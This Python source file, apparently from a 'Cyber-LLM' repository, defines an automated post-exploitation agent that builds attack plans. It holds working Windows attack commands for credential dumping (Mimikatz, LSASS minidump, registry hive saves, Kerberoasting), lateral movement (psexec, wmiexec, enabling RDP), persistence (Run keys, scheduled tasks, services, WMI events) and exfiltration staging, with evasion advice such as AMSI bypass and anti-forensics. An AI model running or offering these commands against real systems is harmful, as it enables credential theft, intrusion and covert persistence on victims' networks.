cyber_llm / src /agents /post_exploit_agent.py
unit731's picture
Upload core Cyber-LLM platform components
23804b3 verified
"""
Cyber-LLM Post-Exploitation Agent
Handles credential harvesting, lateral movement, and persistence operations.
Integrates with Mimikatz, BloodHound, and post-exploitation frameworks.
Author: Muzan Sano
Email: [email protected]
"""
import json
import logging
import subprocess
from typing import Dict, List, Any, Optional
from dataclasses import dataclass
from pydantic import BaseModel
import yaml
from datetime import datetime
# Configure logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class PostExploitRequest(BaseModel):
target_system: str
access_level: str # "user", "admin", "system"
objectives: List[str]
constraints: Dict[str, Any]
stealth_mode: bool = True
class PostExploitResponse(BaseModel):
credential_harvest: Dict[str, Any]
lateral_movement: Dict[str, Any]
persistence: Dict[str, Any]
exfiltration: Dict[str, Any]
command_sequence: List[str]
risk_assessment: Dict[str, Any]
class PostExploitAgent:
"""
Advanced post-exploitation agent for credential harvesting,
lateral movement, and persistence establishment.
"""
def __init__(self, config_path: Optional[str] = None):
self.config = self._load_config(config_path)
self.techniques = self._load_techniques()
self.persistence_methods = self._load_persistence_methods()
def _load_config(self, config_path: Optional[str]) -> Dict[str, Any]:
"""Load post-exploitation configuration."""
if config_path:
with open(config_path, 'r') as f:
return yaml.safe_load(f)
return {
"max_execution_time": 3600,
"cleanup_on_exit": True,
"log_operations": True
}
def _load_techniques(self) -> Dict[str, Any]:
"""Load post-exploitation techniques database."""
return {
"credential_harvest": {
"mimikatz": {
"technique": "T1003.001",
"commands": [
"privilege::debug",
"sekurlsa::logonpasswords",
"sekurlsa::wdigest",
"sekurlsa::kerberos",
"sekurlsa::tspkg"
],
"detection_risk": "high",
"requirements": ["admin_rights", "debug_privilege"]
},
"lsass_dump": {
"technique": "T1003.001",
"commands": [
"rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump [PID] C:\\temp\\lsass.dmp full",
"reg save HKLM\\sam C:\\temp\\sam.hive",
"reg save HKLM\\security C:\\temp\\security.hive",
"reg save HKLM\\system C:\\temp\\system.hive"
],
"detection_risk": "medium",
"requirements": ["admin_rights"]
},
"kerberoasting": {
"technique": "T1558.003",
"commands": [
"powershell -ep bypass",
"Import-Module .\\PowerView.ps1",
"Get-DomainUser -SPN | Get-DomainSPNTicket -Format Hashcat",
"Invoke-Kerberoast -OutputFormat HashCat"
],
"detection_risk": "low",
"requirements": ["domain_user"]
}
},
"lateral_movement": {
"psexec": {
"technique": "T1021.002",
"command_template": "psexec.exe \\\\{target} -u {domain}\\{user} -p {password} cmd.exe",
"detection_risk": "high",
"requirements": ["admin_creds", "smb_access"]
},
"wmiexec": {
"technique": "T1047",
"command_template": "wmiexec.py {domain}/{user}:{password}@{target}",
"detection_risk": "medium",
"requirements": ["admin_creds", "wmi_access"]
},
"rdp": {
"technique": "T1021.001",
"commands": [
"reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
"netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes"
],
"detection_risk": "medium",
"requirements": ["admin_rights"]
}
},
"privilege_escalation": {
"uac_bypass": {
"technique": "T1548.002",
"methods": ["fodhelper", "computerdefaults", "sdclt"],
"detection_risk": "low"
},
"token_impersonation": {
"technique": "T1134",
"commands": [
"list tokens",
"impersonate_token {token}",
"getuid"
],
"detection_risk": "medium"
}
}
}
def _load_persistence_methods(self) -> Dict[str, Any]:
"""Load persistence techniques."""
return {
"registry_run_keys": {
"technique": "T1547.001",
"commands": [
"reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}",
"reg add HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /t REG_SZ /d {payload_path}"
],
"detection_risk": "medium",
"cleanup": "reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v {name} /f"
},
"scheduled_task": {
"technique": "T1053.005",
"commands": [
"schtasks /create /tn {task_name} /tr {payload_path} /sc onlogon /ru system",
"schtasks /run /tn {task_name}"
],
"detection_risk": "low",
"cleanup": "schtasks /delete /tn {task_name} /f"
},
"service_creation": {
"technique": "T1543.003",
"commands": [
"sc create {service_name} binpath= {payload_path} start= auto",
"sc start {service_name}"
],
"detection_risk": "high",
"cleanup": "sc delete {service_name}"
},
"wmi_event": {
"technique": "T1546.003",
"commands": [
"powershell -c \"Register-WmiEvent -Query \\\"SELECT * FROM Win32_LogonSession\\\" -Action { Start-Process {payload_path} }\""
],
"detection_risk": "low",
"cleanup": "powershell -c \"Get-WmiEvent | Unregister-Event\""
}
}
def analyze_bloodhound_data(self, bloodhound_json: Optional[str] = None) -> Dict[str, Any]:
"""
Analyze BloodHound data for lateral movement opportunities.
# HUMAN_APPROVAL_REQUIRED: Review lateral movement paths before execution
"""
# Simulated BloodHound analysis (in practice, would parse actual data)
analysis = {
"high_value_targets": [
{"name": "DC01.domain.local", "type": "Domain Controller", "priority": 1},
{"name": "SQL01.domain.local", "type": "Database Server", "priority": 2},
{"name": "FILE01.domain.local", "type": "File Server", "priority": 3}
],
"attack_paths": [
{
"path": "Current User -> Domain Admins",
"steps": [
"Kerberoast service accounts",
"Crack obtained hashes",
"Move to SQL01 with service account",
"Escalate via SQLi to SYSTEM",
"Extract cached domain admin credentials"
],
"difficulty": "medium",
"detection_risk": "medium"
}
],
"vulnerable_accounts": [
{"name": "svc-sql", "type": "Service Account", "spn": True, "admin": False},
{"name": "backup-svc", "type": "Service Account", "spn": True, "admin": True}
],
"group_memberships": {
"domain_admins": ["administrator", "da-backup"],
"server_operators": ["svc-backup", "svc-sql"],
"account_operators": ["helpdesk1", "helpdesk2"]
}
}
return analysis
def plan_credential_harvest(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]:
"""Plan credential harvesting operations based on access level."""
harvest_plan = {
"primary_techniques": [],
"secondary_techniques": [],
"stealth_considerations": [],
"detection_risks": []
}
if access_level in ["admin", "system"]:
# High privilege techniques
if stealth_mode:
harvest_plan["primary_techniques"].extend([
self.techniques["credential_harvest"]["lsass_dump"],
self.techniques["credential_harvest"]["kerberoasting"]
])
harvest_plan["stealth_considerations"].extend([
"Use process hollowing to avoid direct Mimikatz execution",
"Implement AMSI bypass techniques",
"Use legitimate admin tools where possible"
])
else:
harvest_plan["primary_techniques"].append(
self.techniques["credential_harvest"]["mimikatz"]
)
else:
# User-level techniques
harvest_plan["primary_techniques"].append(
self.techniques["credential_harvest"]["kerberoasting"]
)
harvest_plan["secondary_techniques"].extend([
{
"technique": "Browser Credential Extraction",
"commands": ["powershell -c \"Get-ChromePasswords\""],
"detection_risk": "low"
},
{
"technique": "WiFi Password Extraction",
"commands": ["netsh wlan show profiles", "netsh wlan show profile {profile} key=clear"],
"detection_risk": "very_low"
}
])
return harvest_plan
def plan_lateral_movement(self, bloodhound_analysis: Dict[str, Any], credentials: List[Dict[str, Any]]) -> Dict[str, Any]:
"""Plan lateral movement strategy based on BloodHound analysis and available credentials."""
movement_plan = {
"target_systems": [],
"movement_techniques": [],
"escalation_path": [],
"operational_notes": []
}
# Prioritize targets
for target in bloodhound_analysis["high_value_targets"]:
movement_plan["target_systems"].append({
"hostname": target["name"],
"priority": target["priority"],
"access_methods": ["wmiexec", "psexec", "rdp"],
"required_creds": "admin"
})
# Select movement techniques based on available credentials
if any(cred.get("admin", False) for cred in credentials):
movement_plan["movement_techniques"].extend([
self.techniques["lateral_movement"]["wmiexec"],
self.techniques["lateral_movement"]["psexec"]
])
else:
movement_plan["movement_techniques"].append({
"technique": "T1021.004",
"name": "SSH Lateral Movement",
"command_template": "ssh {user}@{target}",
"detection_risk": "low"
})
# Plan escalation path
for path in bloodhound_analysis["attack_paths"]:
movement_plan["escalation_path"].append({
"path_name": path["path"],
"steps": path["steps"],
"estimated_time": "2-4 hours",
"required_tools": ["PowerView", "Invoke-Kerberoast", "Hashcat"]
})
return movement_plan
def plan_persistence(self, access_level: str, stealth_mode: bool) -> Dict[str, Any]:
"""Plan persistence mechanisms based on access level and stealth requirements."""
persistence_plan = {
"primary_methods": [],
"backup_methods": [],
"cleanup_commands": [],
"monitoring_evasion": []
}
if access_level in ["admin", "system"]:
if stealth_mode:
# Stealthy high-privilege persistence
persistence_plan["primary_methods"].extend([
self.persistence_methods["wmi_event"],
self.persistence_methods["scheduled_task"]
])
else:
# Standard high-privilege persistence
persistence_plan["primary_methods"].extend([
self.persistence_methods["service_creation"],
self.persistence_methods["registry_run_keys"]
])
else:
# User-level persistence
persistence_plan["primary_methods"].append(
self.persistence_methods["registry_run_keys"]
)
# Add cleanup commands
for method in persistence_plan["primary_methods"]:
if "cleanup" in method:
persistence_plan["cleanup_commands"].append(method["cleanup"])
return persistence_plan
def assess_detection_risk(self, operations: List[Dict[str, Any]]) -> Dict[str, Any]:
"""Assess overall detection risk of planned operations."""
risk_levels = {"very_low": 1, "low": 2, "medium": 3, "high": 4, "very_high": 5}
total_risk = 0
operation_count = 0
high_risk_operations = []
for operation in operations:
if "detection_risk" in operation:
risk_score = risk_levels.get(operation["detection_risk"], 3)
total_risk += risk_score
operation_count += 1
if risk_score >= 4:
high_risk_operations.append(operation.get("name", "Unknown Operation"))
average_risk = total_risk / max(operation_count, 1)
risk_assessment = {
"overall_risk_score": average_risk,
"risk_level": "HIGH" if average_risk >= 3.5 else "MEDIUM" if average_risk >= 2.5 else "LOW",
"high_risk_operations": high_risk_operations,
"recommendations": []
}
if average_risk >= 3.5:
risk_assessment["recommendations"].extend([
"Consider using living-off-the-land techniques",
"Implement anti-forensics measures",
"Use process hollowing and injection techniques",
"Rotate tools and techniques frequently"
])
return risk_assessment
def execute_post_exploitation(self, request: PostExploitRequest) -> PostExploitResponse:
"""
Execute complete post-exploitation workflow.
# HUMAN_APPROVAL_REQUIRED: Review post-exploitation plan before execution
"""
logger.info(f"Starting post-exploitation on {request.target_system}")
# Analyze BloodHound data
bloodhound_analysis = self.analyze_bloodhound_data()
# Plan operations
credential_harvest = self.plan_credential_harvest(request.access_level, request.stealth_mode)
# Simulate credentials (in practice, would come from harvest)
mock_credentials = [
{"username": "svc-sql", "password": "Service123!", "domain": "domain.local", "admin": False},
{"username": "backup-svc", "password": "Backup456!", "domain": "domain.local", "admin": True}
]
lateral_movement = self.plan_lateral_movement(bloodhound_analysis, mock_credentials)
persistence = self.plan_persistence(request.access_level, request.stealth_mode)
# Generate command sequence
command_sequence = []
# Credential harvest commands
for technique in credential_harvest["primary_techniques"]:
command_sequence.extend(technique.get("commands", []))
# Lateral movement commands
for technique in lateral_movement["movement_techniques"]:
if "command_template" in technique:
command_sequence.append(f"# {technique.get('name', 'Lateral Movement')}")
command_sequence.append(technique["command_template"])
# Persistence commands
for method in persistence["primary_methods"]:
command_sequence.extend(method.get("commands", []))
# Risk assessment
all_operations = (credential_harvest["primary_techniques"] +
lateral_movement["movement_techniques"] +
persistence["primary_methods"])
risk_assessment = self.assess_detection_risk(all_operations)
# Exfiltration planning
exfiltration = {
"methods": ["DNS tunneling", "HTTPS upload", "Email exfiltration"],
"targets": [
"C:\\Users\\*\\Documents\\*.doc*",
"C:\\Users\\*\\Desktop\\*.pdf",
"Registry hives",
"Browser saved passwords"
],
"staging_location": "C:\\Windows\\Temp\\update.log",
"encryption": "AES-256",
"compression": True
}
response = PostExploitResponse(
credential_harvest=credential_harvest,
lateral_movement=lateral_movement,
persistence=persistence,
exfiltration=exfiltration,
command_sequence=command_sequence,
risk_assessment=risk_assessment
)
logger.info(f"Post-exploitation plan complete for {request.target_system}")
return response
def main():
"""CLI interface for PostExploitAgent."""
import argparse
parser = argparse.ArgumentParser(description="Cyber-LLM Post-Exploitation Agent")
parser.add_argument("--target", required=True, help="Target system identifier")
parser.add_argument("--access-level", choices=["user", "admin", "system"],
default="user", help="Current access level")
parser.add_argument("--objectives", nargs="+", default=["credential_harvest", "lateral_movement"],
help="Post-exploitation objectives")
parser.add_argument("--stealth", action="store_true", help="Enable stealth mode")
parser.add_argument("--config", help="Path to configuration file")
parser.add_argument("--output", help="Output file for results")
args = parser.parse_args()
# Initialize agent
agent = PostExploitAgent(config_path=args.config)
# Create request
request = PostExploitRequest(
target_system=args.target,
access_level=args.access_level,
objectives=args.objectives,
constraints={},
stealth_mode=args.stealth
)
# Execute post-exploitation
response = agent.execute_post_exploitation(request)
# Output results
result = {
"target": args.target,
"credential_harvest": response.credential_harvest,
"lateral_movement": response.lateral_movement,
"persistence": response.persistence,
"exfiltration": response.exfiltration,
"command_sequence": response.command_sequence,
"risk_assessment": response.risk_assessment
}
if args.output:
with open(args.output, 'w') as f:
json.dump(result, f, indent=2)
print(f"Post-exploitation plan saved to {args.output}")
else:
print(json.dumps(result, indent=2))
if __name__ == "__main__":
main()